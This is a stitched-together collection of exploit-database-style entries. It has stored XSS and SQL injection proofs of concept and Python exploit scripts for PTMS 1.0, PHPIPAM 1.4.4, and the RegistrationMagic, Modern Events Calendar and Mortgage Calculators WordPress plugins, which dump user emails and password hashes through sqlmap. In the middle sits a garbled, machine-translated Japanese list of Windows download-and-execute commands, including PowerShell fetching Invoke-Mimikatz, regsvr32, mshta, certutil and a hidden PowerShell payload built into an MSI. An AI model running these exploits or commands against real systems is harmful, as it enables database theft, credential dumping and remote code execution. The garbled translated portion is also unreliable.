-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated) # Date: 19/01/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Kali Linux # Description: Stored XSS in multiple fields... # Steps to reproduce (with employee Access) # Log in as an employee # Go to : http://localhost/ptms/?page=user # Add XSS payload to any field of the user's name. #Click Update ================= POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 Host: localhost Content-Length: 1339 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak Origin: http://localhost Referer: http://localhost/ptms/?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="id" 4 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="code" 2022-0003 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="generated_password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="firstname" Mark ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="middlename" <script>alert("XSS_TEST")</script> ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="lastname" Cooper ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="department" IT Department ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="position" Department Manager ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="email" mcooper@sample.com ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryvsLkAfaBC64Uzoak-- ================= ----------------------------------------------------------------------------- # Steps to reproduce (with Admin access) # Log in to the admin panel # Go to : http://localhost/ptms/admin/?page=system_info # Add XSS payload to the 'System Name' field #Click Update ================= POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Content-Length: 603 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq Origin: http://localhost Referer: http://localhost/ptms/admin/?page=system_info Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="name" Online Project Time Management System - PHP <script>alert("XSS")</script> ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="short_name" PTMS - PHP ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="cover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq-- =================

# Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated) # Date: 19/01/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Kali Linux # Steps to reproduce # Log in as an employee # Go to : http://localhost/ptms/?page=user # Click Update # Save request in BurpSuite # Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump ========================== POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 Host: localhost Content-Length: 1362 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz Origin: http://localhost Referer: http://localhost/ptms/?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="id" 4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="code" 2022-0003 ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="generated_password" ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="firstname" Mark 2223 ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="middlename" Z ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="lastname" Cooper ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="department" IT Department ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="position" Department Manager ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="email" mcooper@sample.com ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="password" ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary39q8yel1pdwYRLNz-- ========================== #Payloads #++++++++++++ #Payload: (Boolean-Based Blind) #------WebKitFormBoundary39q8yel1pdwYRLNz #Content-Disposition: form-data; name="id" #4' or 1=1 -- #-------- #Payload: (time-based blind) #------WebKitFormBoundary39q8yel1pdwYRLNz #Content-Disposition: form-data; name="id" #4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test #-------

# Exploit Title: WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 25-10-2021 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: https://lenderd.com/ # Software Link: https://mortgagecalculatorsplugin.com/ # Version: 1.52 # Tested on: Linux # CVE : CVE-2021-24904 (https://wpscan.com/vulnerability/7b80f89b-e724-41c5-aa03-21d1eef50f21) # Description: The plugin gives users real-time estimates by providing mortgage calculators. It does not implement any sanitisation on the color value of the background of a calculator in admin panel, which could lead to authenticated Stored Cross-Site Scripting issues. An attacker can execute malicious javascript codes for all visitors of a page containing the calculator. # Steps To Reproduce: 1. Go to settings page available under the "Calculator" menu item. 2. Click the "Select Color" button and type the following payload the input space: `hacked</style></head><script>alert(1)</script>` 3. Click the "Save Changes" button to save settings. 4. Create a new page and add the shortcode ([mcwp type="cv"]) of the calculator, for testing. 5. Visit the page to trigger XSS.

# Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated) # Google Dork: [if applicable] # Date: 20/01/2022 # Exploit Author: Rodolfo "Inc0gbyt3" Tavares # Vendor Homepage: https://github.com/phpipam/phpipam # Software Link: https://github.com/phpipam/phpipam # Version: 1.4.4 # Tested on: Linux/Windows # CVE : CVE-2022-23046 import requests import sys import argparse ################ """ Author of exploit: Rodolfo 'Inc0gbyt3' Tavares CVE: CVE-2022-23046 Type: SQL Injection Usage: $ python3 -m pip install requests $ python3 exploit.py -u http://localhost:8082 -U <admin> -P <password> """ ############### __author__ = "Inc0gbyt3" menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046") menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str) menu.add_argument("-U", "--user", help="[+] Username", type=str) menu.add_argument("-P", "--password", help="[+] Password", type=str) args = menu.parse_args() if len(sys.argv) < 3: menu.print_help() target = args.url user = args.user password = args.password def get_token(): u = f"{target}/app/login/login_check.php" try: r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password}) headers = r.headers['Set-Cookie'] headers_string = headers.split(';') for s in headers_string: if "phpipam" in s and "," in s: # double same cookie Check LoL cookie = s.strip(',').lstrip() return cookie except Exception as e: print(f"[+] {e}") def exploit_sqli(): cookie = get_token() xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php" data = { "subnet":'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -', # dios query dump all :) "bgp_id":1 } headers = { "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie": cookie } try: r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data) if "admin" in r.text or "rounds" in r.text: print("[+] Vulnerable..\n\n") print(f"> Users and hash passwords: \n\n{r.text}") print("\n\n> DONE <") except Exception as e: print(f"[-] {e}") if __name__ == '__main__': exploit_sqli()

1.BitsAdminコマンド（指定されたパス、Win7以降にコマンドのみをダウンロードできます）： bitsadmin/mydownloadjob/download/download/priority normal 'http://img5.5.5.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg' 'D: \ ABC.jpg' '' '' d: \ BitsAdmin /Transfer D90f 3http://Site.com/A％AppData％\ D90f.exe％AppData％\ D90f.exedel％appdata％\ d90f.exe 2.PowerShellの名前のダウンロードと実行：（ Win7以降） PowerShell IEX（new-Object Net.WebClient）.DownLoadString（ 'https://Raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1'）; Invoke-Mimikatz Powershell -exec bypass -f \\ webdavserver \ folder \ payload.ps1 powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.168.183/1.exe','C:\111111111111111111111.exe') PowerShell -W Hidden -C（new-Object System.net.WebClient）.DownLoadFile（ 'http://img5.cache.netease.com/photo/0001/2013-03-28/8r1bk3qo3r710001.jpg'、 'd3360 \\ 1.jpg'） 3.mshtaコマンドダウンロードと実行 MSHTA VBScript:Close（execute（ 'getObject（' 'script:http://webserver/payload.sct' '））））） MSHTA http://Webserver/payload.hta ---短いドメイン名：http://SINA.lt/ - MSHTA http://T.CN/RYUQYF8 mshta \\ webdavserver \ folder \ payload.hta payload.hta HTML Meta http-equiv='content-type' content='text/html; charset=utf-8 ' 頭 スクリプト言語='vbscript' window.resizeto 0、0 Window.Moveto -2000、-2000 set objshell=createObject（ 'wscript.shell'） objshell.run 'calc.exe' self.close /スクリプト 体 デモ /体 /頭 /HTML 4。 rundll32コマンドダウンロードと実行 rundll32 \\ webdavserver \ folder \ payload.dll、エントリポイント rundll32.exe javascript: '\ . \ mshtml、runhtmlapplication'; o=getobject（ 'script:3358webserver/payload.sct'）; window.close（）; 参照：https://github.com/3gstudent/javascript-backdoor 5.NET Regasmコマンドをダウンロードして実行します c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ regasm.exe /u \ webdavserver\folder\payload.dll 6.CMDリモートコマンドのダウンロード： cmd.exe /k \\ webdavserver \ folder \ batchfile.txt 7.REGSVR32コマンドのダウンロードと実行 regsvr32 /u /n /s /i3360http://webserver/payload.sct scrobj.dll regsvr32 /u /n /s /i: \ webdavserver\folder\payload.sct scrobj.dll regsvr32 /u /s /i:3358site.com/js.png scrobj.dll js.png ？xmlバージョン='1.0'？ スクリプトレット 登録 progid='shortjsrat' classId='{10001111-0000-0000-0000-0000-0000Feedacdc}' ！ - Casey Smith @Subteeから学ぶ - スクリプト言語='jscript' ！[cdata [ ps='cmd.exe /c calc.exe'; new ActiveXObject（ 'wscript.shell'）。run（ps、0、true）; ]] /スクリプト /登録 /スクリプトレット 8.Certutilコマンドのダウンロードと実行 certutil -urlcache -split -f http://webserver/ペイロードペイロード certutil -urlcache -split -f http://webserver /payload.b64 payload.b64 certutil -decode payload.b64 payload.dll c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ instalutil /logfile=ulgfile=ul gaylod. certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 certutil -decode payload.b64 payload.exe payload.exe certutil -urlcache -split -f http://site.com/a a.exe a.exe del a.exe certutil -urlcache -f http://192.168.254.102:80/a Delete 9.net 9.net でmsbulidコマンドをダウンロードして実行します cmd /v /c 'set mb=' c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ msbuild.exe '！mb！ /noauteresponse /preprocess \\ webdavserver \ folder \ payload.xml payload.xml！mb！ payload.xml ' 10。 ODBCCONFコマンドのダウンロードと実行 odbcconf /s /a {regsvr \\ webdavserver \ folder \ payload_dll.txt} 11.cscriptスクリプトリモートコマンドのダウンロードと実行 cscript/b c: \ windows \ system32 \ printing_admin_scripts \ zh-cn \ pubprn.vbs 127.0.0.1 Script:https://raw.githubusercontent.com/3gstudent/test/master/downdoadexec3.sct cscript //e:jscript \\ webdavserver \ folder \ payload.txt downfile.vbs: '設定を設定します strfileurl='https://hacker.bz/t/tu/ckhxbukkqru9204.jpg' strhdlocation='c: \ logo.jpg' 'ファイルを取得します set objxmlhttp=createObject（ 'msxml2.xmlhttp'） objxmlhttp.open 'get'、strfileurl、false objxmlhttp.send（） objxmlhttp.status=200の場合 objadostream=createObject（ 'adodb.stream'）を設定します objadostream.open objadostream.type=1 'adtypebinary objadostream.write objxmlhttp.responsebody objadostream.position=0'STREMの位置を開始までセットします set objfso=createObject（ 'scripting.filesystemobject'） objfso.fileexists（strhdlocation）の場合、objfso.deletefile strhdlocation objfso=何も設定しません objadostream.savetofile strhdlocation objadostream.close objadostream=Nothingを設定します ifを終了します objxmlhttp=何も設定しません 上記をdownfile.vbsとして保存します コマンドを入力してください：cscript downfile.vbs 12.pubprn.vbsコマンドをダウンロードして実行 cscript /b c: \ windows \ system32 \ printing_admin_scripts \ zh-cn \ pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.scs 13.windowsには独自のコマンドコピーが付属しています コピー\\ x.x.x.x \ xx \ poc.exe Xcopy D: \ test.exe \\ x.x.x \ test.exe 14。 iexplore.exeコマンドをダウンロードして実行します（つまり、odayが必要です） 'C: \ Program Files \ Internet Explorer \ iexplore.exe' http://site.com/exp 15.ieexcコマンドのダウンロードと実行 c: \ windows \ microsoft.net \ framework \ v2.0.50727 \ caspol -s off c: \ windows \ microsoft.net \ framework \ v2.0.50727 \ ieexec http://site.com/files/test64.exe 参照：https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ 16。 msiexecコマンドのダウンロードと実行 msiexec /q /i https://hacker.bz/t/tu/icr2sy1pdlx9205.png この方法は、以前の2つの記事《渗透测试中的msiexec》 《渗透技巧——从Admin权限切换到System权限》で紹介されています。この方法を紹介しましたが、詳細を繰り返しません。 まず、Base64エンコーディングは、PowerShell実装のダウンロードと実行のコードとして使用されます。 $ filecontent='（new-Object System.net.webclient）.downloadfile（' https://github.com/3gstudent/test/raw/master/putty.exe '、' c: \ download \ a.exe '）; start-process' c3360 $ bytes=[system.text.encoding] :3360Unicode.getBytes（$ filecontent）; $ encoded=[System.Convert] :3360TOBASE64STRING（$ bytes）; $エンコード 得る： kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa== 完全なPowerShellコマンドは次のとおりです。 PowerShell -WindowStyle Hidden -Ec kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa== 完全なWIXファイルは次のとおりです。 ？xmlバージョン='1.0'？ WIX XMLNS='http://SCHEMAS.MICROSOFT.COM/WIX/2006/WI' 製品ID='*' upgradeCode='12345678-1234-1234-1234-11111111111111111111111111111111111111111111111111111111111111111年目の例 名前'バージョン=' 0.0.1 'メーカー='@_ xpn_ '言語=' 1033 ' パッケージinstallerversion='200'圧縮='はい'コメント='Windowsインストーラーパッケージ'/ メディアID='1' / ディレクトリid='targetdir' name='sourcedir' ディレクトリID='ProgramFilesFolder' ディレクトリid='installlocation' name='example' Component Id='ApplicationFiles' Guid='12345678-1234-1234-1234-2222222222222222222222222222222222222222 /成分 /ディレクトリ /ディレクトリ /ディレクトリ feature id='defaultfeature' level='1' componentref id='applicationFiles'/ /特徴 プロパティID='CMDLINE'POWERSHELL -WINDOWSTYLE HIDDEN -ENC kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa== /財産 Customaction ID='SystemShell' execute='Deferred' Directory='TargetDir' execommand='[cmdline]' return='無視' Imprionate='no'/ customaction id='failinstall' execute='deferred' script='vbscript' return='check' VBSがインストールに失敗するように無効になりました /カスタムアクション InstallexecuteSequence カスタムアクション='Systemshell' after='installInitialize'/custom カスタムアクション='failinstall' before='installfiles'/custom /installexecuteSequence /製品 /wix コンパイルしてMSIファイルを生成します。コマンドは次のとおりです。 candle.exe msgen.wix light.exe msgen.wixobj test.msiを生成します 実装関数：msiexec/q/i 3https://github.com/3gstudent/test/raw/master/test.msi 注：実行後、プロセスを手動で終了する必要がありますmsiexec.exe Baiduが提供する短いアドレスサービス（http://dwz.cn/）と組み合わせると、実装コードは34文字で、コードは次のとおりです。 msiexec /q /i http://dwz.cn/6ujpf8 17。コマンドをダウンロードして、Project GreatSct を実行します https://github.com/greatsct/

# Exploit Title: WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated) # Date 23.01.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://registrationmagic.com/ # Software Link: https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip # Version: <= 5.0.1.5 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24862 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md ''' Description: The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue. ''' # Banner: import os banner = ''' _____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___ | | | | __|___|_ | |_ |_ | ___|_ | | | . | _|_ | | --| | | __|___| _| | | _|_| |_|___| _|_ | . | . | _| |_____|\___/|_____| |___|___|___|_____| |___| |_|___|___|___| [+] RegistrationMagic SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import string import argparse import requests from datetime import datetime import random import json import subprocess # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # Create task to ensure duplicate: dupl_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2' # Header: header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + target_ip + ':' + target_port + "/wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://" + target_ip, "Connection": "close", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1" } # Body body = { "rmc-task-edit-form-subbed": "yes", "rm-task-slide": "on", "rmc_task_name": "Exploitdevelopmenthack" + ''.join(random.choice(string.ascii_letters) for x in range(12)), "rmc_task_description": "fiasfdhb", "rmc_rule_sub_time_older_than_age": '', "rmc_rule_sub_time_younger_than_age": '', "rmc_rule_fv_fids[]": '', "rmc_rule_fv_fvals[]": '', "rmc_rule_pay_status[]": "pending", "rmc_rule_pay_status[]": "canceled", "rmc_action_user_acc": "do_nothing", "rmc_action_send_mail_sub": '', "rmc_action_send_mail_body": '' } # Create project a = session.post(dupl_url, headers=header, data=body) # SQL-Injection (Exploit): exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' # Generate payload for sqlmap print ('[+] Payload for sqlmap exploitation:') cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') cookie = cookie.replace(',', '; ') exploitcode_url = "sqlmap -u http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' exploitcode_risk = ' --level 2 --risk 2 --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids%5B%5D=2"' exploitcode_cookie = ' --cookie="' + cookie + '"' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + ' ' + retrieve_mode + ' -p task_ids[] -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated) # Date 26.01.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://webnus.net/modern-events-calendar/ # Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip # Version: <= 6.1 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24946 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md ''' Description: The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue ''' #Banner: banner = ''' .oOOOo. o 'O o.OOoOoo .O o O o O .oOOo. .oOOo. .oOOo. oO .oOOo. o O .oOOo. o O .oOOo. o o O o O O o O O O O o O o O o O o o o ooOO o o O o o o o o o O o o o o O O' O ooooooooo O' o o O' O ooooooooo O' OooOOo `OooOo OooOOo OoOOo. O `o o o O O O O o O O O O O O `o .o `o O O .O o O .O O .O o o o O o `OoooO' `o' ooOooOoO oOoOoO `OooO' oOoOoO OooOO oOoOoO O `OooO' O `OooO' [+] Modern Events Calendar Lite SQL-Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import requests import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH # Exploit: print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" ' exploitcode_risk = ' -p time' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + retrieve_mode + exploitcode_risk os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

